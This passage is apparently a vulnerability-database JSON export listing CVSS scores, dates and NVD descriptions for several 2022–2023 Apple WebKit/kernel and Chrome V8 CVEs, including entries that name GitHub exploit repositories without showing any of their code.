AcceleratorTroll\u2122 <img src=\"acceleratortroll/Assets.xcassets/A...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2023-05-15T14:22:12", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Apple Ipados", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28206"], "modified": "2023-09-08T02:23:04", "id": "FF24BCC9-8BC6-565B-AAA2-21351E9FD2D8", "href": "", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-30T18:54:28", "description": "# CVE-2023-2033-Analysis\n\nThe full bug report has been published...", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2023-04-26T15:24:02", "type": "githubexploit", "title": "Exploit for Type Confusion in Google Chrome", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2033"], "modified": "2023-10-11T08:20:02", "id": "82BB504A-197C-55FF-8E5D-895F8C421296", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-02T20:22:55", "description": "# Chrome-and-Edge-Version-Dumper\nPowershell script ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-29T20:06:33", "type": "githubexploit", "title": "Exploit for Type Confusion in Google Chrome", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2023-09-28T11:37:29", "id": "D424D6C6-13F7-5CAE-8771-9103296520B9", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "prion": [{"lastseen": "2023-11-18T22:52:37", "description": "An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Monterey 12.6.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1, iOS 15.7.5 and iPadOS 15.7.5, macOS Big Sur 11.7.6. An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2023-04-10T19:15:00", "type": "prion", "title": "Input validation", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28206"], "modified": "2023-07-27T04:15:00", "id": "PRION:CVE-2023-28206", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2023-28206", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-20T22:37:48", "description": "Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2023-04-14T19:15:00", "type": "prion", "title": "Type confusion", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2033"], "modified": "2023-11-08T22:15:00", "id": "PRION:CVE-2023-2033", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2023-2033", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-18T22:52:37", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in Safari 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-10T19:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-07-27T04:15:00", "id": "PRION:CVE-2023-28205", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2023-28205", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-20T23:46:26", "description": "Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-01T23:15:00", "type": "prion", "title": "Type confusion", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-3723"], "modified": "2023-05-03T12:16:00", "id": "PRION:CVE-2022-3723", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-3723", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-20T23:53:11", "description": "Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-02T21:15:00", "type": "prion", "title": "Type confusion", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-4262"], "modified": "2022-12-05T14:18:00", "id": "PRION:CVE-2022-4262", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-4262", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-18T22:39:31", "description": "A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free vulnerability. This flaw allows attackers with network access to pass specially crafted web content files, causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205 security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-17T22:15:00", "type": "prion", "title": "Input validation", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-25T17:25:00", "id": "PRION:CVE-2023-2203", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2023-2203", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-11-20T23:18:44", "description": "Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-26T22:15:00", "type": "prion", "title": "Type confusion", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1364"], "modified": "2022-08-30T17:55:00", "id": "PRION:CVE-2022-1364", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-1364", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-20T23:18:14", "description": "Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-23T00:15:00", "type": "prion", "title": "Type confusion", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2022-10-27T22:50:00", "id": "PRION:CVE-2022-1096", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-1096", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-11-08T18:34:34", "description": "An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Monterey 12.6.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1, iOS 15.7.5 and iPadOS 15.7.5, macOS Big Sur 11.7.6. An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2023-04-10T19:15:00", "type": "cve", "title": "CVE-2023-28206", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28206"], "modified": "2023-07-27T04:15:00", "cpe": [], "id": "CVE-2023-28206", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-28206", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-12-02T17:59:19", "description": "Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-01T23:15:00", "type": "cve", "title": "CVE-2022-3723", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-3723"], "modified": "2023-05-03T12:16:00", "cpe": [], "id": "CVE-2022-3723", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-3723", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-11-08T18:34:34", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in Safari 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-10T19:15:00", "type": "cve", "title": "CVE-2023-28205", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-07-27T04:15:00", "cpe": [], "id": "CVE-2023-28205", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-28205", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-11-30T17:35:59", "description": "Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2023-04-14T19:15:09", "type": "cve", "title": "CVE-2023-2033", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2033"], "modified": "2023-11-08T22:15:08", "cpe": [], "id": "CVE-2023-2033", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-2033", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-12-02T16:27:23", "description": "Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-26T22:15:00", "type": "cve", "title": "CVE-2022-1364", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1364"], "modified": "2022-08-30T17:55:00", "cpe": [], "id": "CVE-2022-1364", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-1364", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-12-02T18:20:41", "description": "Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-02T21:15:00", "type": "cve", "title": "CVE-2022-4262", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-4262"], "modified": "2022-12-05T14:18:00", "cpe": [], "id": "CVE-2022-4262", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-4262", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-11-08T18:07:11", "description": "A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free vulnerability. This flaw allows attackers with network access to pass specially crafted web content files, causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205 security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-17T22:15:00", "type": "cve", "title": "CVE-2023-2203", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-25T17:25:00", "cpe": ["cpe:/o:redhat:enterprise_linux_eus:9.2", "cpe:/o:redhat:enterprise_linux_server_aus:8.8", "cpe:/a:webkitgtk:webkit2gtk3:2.38.5-1.el8", "cpe:/a:webkitgtk:webkit2gtk3:2.38.5-1.el9", "cpe:/o:redhat:enterprise_linux_eus:8.8", "cpe:/o:redhat:enterprise_linux:9.0", "cpe:/o:redhat:enterprise_linux_server_aus:9.2", "cpe:/o:redhat:enterprise_linux_server_tus:8.8", "cpe:/o:redhat:enterprise_linux:8.0"], "id": "CVE-2023-2203", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-2203", "cvss": {"score": 6.5, "vector": 